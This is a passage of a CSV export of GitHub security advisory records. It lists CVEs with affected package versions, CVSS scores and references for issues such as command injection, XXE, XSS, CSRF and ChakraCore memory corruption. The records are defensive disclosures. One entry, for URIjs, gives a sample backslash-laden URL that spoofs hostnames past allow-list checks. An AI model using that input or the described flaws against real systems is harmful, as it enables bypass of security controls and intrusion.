'https://typo3.org/security/advisory/typo3-core-sa-2021-013'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:24:00Z', 'nvd_published_at': '2021-07-20T16:15:00Z'}" +1.4.0,GHSA-3fxp-vwxm-2r5p,2021-08-03T18:58:25Z,2021-07-26T21:23:35Z,,['CVE-2021-23412'],Command injection in gitlogplus,"All versions of package gitlogplus are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gitlogplus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23412'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/808942'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GITLOGPLUS-1315832'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/gitlogplus'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:27:36Z', 'nvd_published_at': '2021-07-23T16:15:00Z'}" +1.4.0,GHSA-cv9j-78f7-w6v9,2021-07-28T19:21:31Z,2021-07-26T21:41:22Z,,['CVE-2020-25025'],Incorrect Authorization in TYPO3 extension,"The l10nmgr (aka Localization Manager) extension before 7.4.0, 8.x before 8.7.0, and 9.x before 9.2.0 for TYPO3 allows Information Disclosure (translatable fields).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'localizationteam/l10nmgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.4.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'localizationteam/l10nmgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'localizationteam/l10nmgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25025'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-016'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:51:12Z', 'nvd_published_at': '2020-09-02T17:15:00Z'}" +1.4.0,GHSA-qwmj-72mp-q3m2,2021-07-28T19:17:48Z,2021-07-26T21:34:58Z,,['CVE-2020-12700'],Missing Authorization in TYPO3 extension,The direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'directmailteam/direct-mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12700'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-005'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:04:06Z', 'nvd_published_at': '2020-05-13T13:15:00Z'}" +1.4.0,GHSA-hxxp-6546-wv6r,2022-12-15T18:33:24Z,2021-07-02T18:36:13Z,,['CVE-2021-21672'],XXE vulnerability in Jenkins Selenium HTML report Plugin,"Selenium HTML report Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. + +This allows attackers with the ability to control the report files parsed using this plugin to have Jenkins parse a crafted report file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. + +Selenium HTML report Plugin 1.1 disables external entity resolution for its XML parser.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:seleniumhtmlreport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21672'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/seleniumhtmlreport-plugin/commit/5ca59b8c7d23af4450dc7f19c1b4107d59063ae1'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/seleniumhtmlreport-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-06-30/#SECURITY-2329'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/30/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/04/14/2'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T20:14:49Z', 'nvd_published_at': '2021-06-30T17:15:00Z'}" +1.4.0,GHSA-g644-6fg4-hrh9,2021-07-27T14:02:34Z,2021-07-28T18:57:47Z,,['CVE-2020-0830'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0830'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0830'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:02:34Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-86gw-g9jv-8vfg,2021-07-27T13:56:56Z,2021-07-28T18:57:55Z,,['CVE-2020-0833'], Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0833'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0833'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T13:56:56Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-v9j2-q4q5-cxh4,2021-07-02T16:41:31Z,2021-07-02T19:19:13Z,,['CVE-2021-32730'],No CSRF protection on the password change form,"### Impact +It's possible for forge an URL that, when accessed by an admin, will reset the password of any user in XWiki. + +### Patches +The problem has been patched in XWiki 12.10.5, 13.2RC1. + +### Workarounds +It's possible to apply the patch manually by modifying the `register_macros.vm` template like in https://github.com/xwiki/xwiki-platform/commit/0a36dbcc5421d450366580217a47cc44d32f7257. + +### References +https://jira.xwiki.org/browse/XWIKI-18315 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Jira XWiki](https://jira.xwiki.org) +* Email us at [security ML](mailto:security@xwiki.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.0'}, {'fixed': '13.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-v9j2-q4q5-cxh4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32730'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/0a36dbcc5421d450366580217a47cc44d32f7257'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-18315'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:41:31Z', 'nvd_published_at': '2021-07-01T18:15:00Z'}" +1.4.0,GHSA-7f53-fmmv-mfjv,2021-06-10T14:10:51Z,2021-07-20T17:33:28Z,,['CVE-2020-1920'],Regular expression denial of service in react-native,"A regular expression denial of service (ReDoS) vulnerability in the validateBaseUrl function can cause the application to use excessive resources, become unresponsive, or crash. This was introduced in react-native version 0.59.0 and fixed in version 0.64.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-native'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.59.0'}, {'fixed': '0.62.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'react-native'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.63.0'}, {'fixed': '0.64.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1920'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react-native/commit/ca09ae82715e33c9ac77b3fa55495cf84ba891c7'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react-native/releases/tag/v0.62.3'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react-native/releases/tag/v0.64.1'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-293-redos-react-native/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/react-native'}]","{'cwe_ids': ['CWE-400', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-02T19:22:39Z', 'nvd_published_at': '2021-06-01T14:15:00Z'}" +1.4.0,GHSA-h2xm-2p6w-mj2v,2021-07-26T22:17:18Z,2021-07-28T18:58:14Z,,['CVE-2020-0831'],Out-of-bounds Write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0831'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0831'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T22:17:18Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-fv48-hjhp-94c7,2021-07-26T21:12:18Z,2021-07-26T21:20:38Z,,['CVE-2020-12477'],Incorrect Authorization in TeamPass,The REST API functions in TeamPass 2.1.27.36 allow any user with a valid API token to bypass IP address whitelist restrictions via an X-Forwarded-For client HTTP header to the getIp function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.27.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12477'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/TeamPass/issues/2761'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:12:18Z', 'nvd_published_at': '2020-04-29T22:15:00Z'}" +1.4.0,GHSA-6cgh-hjpw-q3gq,2021-07-02T18:25:08Z,2021-07-02T19:20:33Z,,['CVE-2021-32738'],Utils.readChallengeTx does not verify the server account signature,"The `Utils.readChallengeTx` function used in [SEP-10 Stellar Web Authentication](https://github.com/stellar/stellar-protocol/blob/master/ecosystem/sep-0010.md) states in its function documentation that it reads and validates the challenge transaction including verifying that the `serverAccountID` has signed the transaction. The function does not verify that the server has signed the transaction and has been fixed so that it does in v8.2.3. + +Applications that also used `Utils.verifyChallengeTxThreshold` or `Utils.verifyChallengeTxSigners` to verify the signatures including the server signature on the challenge transaction are unaffected as those functions verify the server signed the transaction. + +Applications calling `Utils.readChallengeTx` should update to v8.2.3 to ensure that the challenge transaction is completely valid and signed by the server creating the challenge transaction.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'stellar-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/stellar/js-stellar-sdk/security/advisories/GHSA-6cgh-hjpw-q3gq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32738'}, {'type': 'WEB', 'url': 'https://github.com/stellar/js-stellar-sdk/commit/6f0bb889c2d10b431ddd5f4a1bcdd519c80430b3'}, {'type': 'WEB', 'url': 'https://github.com/stellar/js-stellar-sdk/releases/tag/v8.2.3'}]","{'cwe_ids': ['CWE-287', 'CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T18:25:08Z', 'nvd_published_at': '2021-07-02T19:15:00Z'}" +1.4.0,GHSA-rr6v-h7m8-wc9f,2021-07-29T15:14:44Z,2021-07-19T21:21:33Z,,['CVE-2021-28114'],Cross-site Scripting in Froala WYSIWYG Editor,Froala WYSIWYG Editor 3.2.6-1 is affected by XSS due to a namespace confusion during parsing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froala/wysiwyg-editor'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28114'}, {'type': 'WEB', 'url': 'https://froala.com/wysiwyg-editor/'}, {'type': 'WEB', 'url': 'https://labs.bishopfox.com/advisories/froala-editor-v3.2.6'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T16:39:49Z', 'nvd_published_at': '2021-07-16T13:15:00Z'}" +1.4.0,GHSA-fp63-499m-hq6m,2021-07-09T14:04:21Z,2021-07-12T16:53:00Z,,['CVE-2021-32752'],Files or Directories Accessible to External Parties in ether/logs,"### Impact +A vulnerability was found that allowed authenticated admin users to access any file on the server. + +### Patches +The vulnerability has been fixed in 3.0.4. + +### Workarounds +We recommend disabling the plugin if untrustworthy sources have admin access. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [ether/logs](https://github.com/ethercreative/logs/issues) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ether/logs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethercreative/logs/security/advisories/GHSA-fp63-499m-hq6m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32752'}, {'type': 'WEB', 'url': 'https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4'}, {'type': 'WEB', 'url': 'https://github.com/ethercreative/logs/releases/tag/3.0.4'}]","{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-09T14:04:21Z', 'nvd_published_at': '2021-07-09T14:15:00Z'}" +1.4.0,GHSA-j5c2-hm46-wp5c,2021-09-03T20:23:05Z,2021-07-22T19:43:16Z,,['CVE-2021-39192'],Privilege escalation: all users can access Admin-level API keys,"### Impact +An error in the implementation of the limits service in 4.0.0 allows all authenticated users (including contributors) to view admin-level API keys via the integrations API endpoint, leading to a privilege escalation vulnerability. + +Ghost(Pro) has already been patched. Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.9.4. Immediate action should be taken to secure your site - see patches & workarounds below. + +It is highly recommended to regenerate all API keys after patching or applying the workaround below. + +### Patches +Fixed in 4.10.0, all 4.x sites should upgrade as soon as possible. + +### Workarounds +- Disable all non-Administrator accounts to prevent API access. + +### For more information +If you have any questions or comments about this advisory: +* email us at security@ghost.org + +--- +Credits: Aden Yap Chuen Zhen, BAE Systems Applied Intelligence (Malaysia)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-j5c2-hm46-wp5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39192'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/releases/tag/v4.10.0'}]","{'cwe_ids': ['CWE-200', 'CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:44:30Z', 'nvd_published_at': '2021-09-03T15:15:00Z'}" +1.4.0,GHSA-mx67-wv8x-hvv9,2021-09-15T19:12:25Z,2021-07-26T21:24:09Z,2021-09-15T19:12:25Z,['CVE-2021-23410'],Deserialization of Untrusted Data in msgpack,"# Withdrawn + +This advisory was withdrawn by its CNA (Snyk). + +## Original advisory + +All versions of package `msgpack` are vulnerable to Deserialization of Untrusted Data via the unpack function. This does not affect the similarly named package `@msgpack/msgpack`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'msgpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23410'}, {'type': 'PACKAGE', 'url': 'https://github.com/msgpack/msgpack-node/'}, {'type': 'WEB', 'url': 'https://github.com/msgpack/msgpack-node/blob/master/src/msgpack.cc%23L302-L335'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MSGPACK-1296122'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:38:45Z', 'nvd_published_at': '2021-07-21T17:15:00Z'}" +1.4.0,GHSA-62ww-4p3p-7fhj,2021-05-25T20:48:19Z,2021-07-02T18:33:02Z,,['CVE-2021-22135'],API information disclosure flaw in Elasticsearch,Elasticsearch versions before 7.11.2 and 6.8.15 contain a document disclosure flaw was found in the Elasticsearch suggester and profile API when Document and Field Level Security are enabled. The suggester and profile API are normally disabled for an index when document level security is enabled on the index. Certain queries are able to enable the profiler and suggester which could lead to disclosing the existence of documents and fields the attacker should not be able to view.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.11.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.8.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22135'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-12-0-and-6-8-15-security-update/268125'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210625-0003/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T20:02:56Z', 'nvd_published_at': '2021-05-13T18:15:00Z'}" +1.4.0,GHSA-89gv-h8wf-cg8r,2023-09-07T20:18:00Z,2021-07-19T21:22:36Z,,['CVE-2021-3647'],URIjs Vulnerable to Hostname spoofing via backslashes in URL ,"### Impact +If using affected versions to determine a URL's hostname, the hostname can be spoofed by using a combination of backslash (`\`) and slash (`/`) characters as part of the scheme delimiter, e.g. `scheme:/\/\/\hostname`. If the hostname is used in security decisions, the decision may be incorrect. + +Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior. + +Example URL: `https:/\/\/\expected-example.com/path` +Escaped string: `https:/\\/\\/\\expected-example.com/path` (JavaScript strings must escape backslash) + +Affected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html). + +### Patches +Version 1.19.7 is patched against all known payload variants. + +### References +https://github.com/medialize/URI.js/releases/tag/v1.19.7 (fix for this particular bypass) +https://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for related bypass) +https://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass) +https://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass) +[PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling) + +### For more information +If you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js + +### Reporter credit +[ready-research](https://github.com/ready-research) via https://huntr.dev/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'urijs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/security/advisories/GHSA-89gv-h8wf-cg8r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3647'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/pull/233'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/commit/ac43ca8f80c042f0256fb551ea5203863dec4481'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.3'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.4'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.6'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.7'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1625558772840-medialize/URI.js'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T16:38:54Z', 'nvd_published_at': '2021-07-16T11:15:00Z'}" +1.4.0,GHSA-c8qc-62qv-5p2x,2021-07-26T22:14:49Z,2021-07-28T18:58:22Z,,['CVE-2020-0828'],Out-of-bounds Write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0828'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0828'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T22:14:49Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-h58v-c6rf-g9f7,2023-04-25T16:32:27Z,2021-07-01T17:00:04Z,,['CVE-2021-35210'],Cross site scripting in the system log,"### Impact + +It is possible to inject code into the `tl_log` table that will be executed in the browser when the system log is called in the back end. + +### Patches + +Update to Contao 4.9.16 or 4.11.5. + +### Workarounds + +Disable the system log module in the back end for all users (especially admin users). + +### References + +https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021 + +### For more information + +If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.9.16'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.11.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-h58v-c6rf-g9f7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35210'}, {'type': 'WEB', 'url': 'https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-23T20:24:28Z', 'nvd_published_at': '2021-06-23T11:15:00Z'}" +1.4.0,GHSA-5p67-cp9c-hqw4,2021-07-27T14:20:39Z,2021-07-28T18:57:19Z,,['CVE-2020-0848'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': 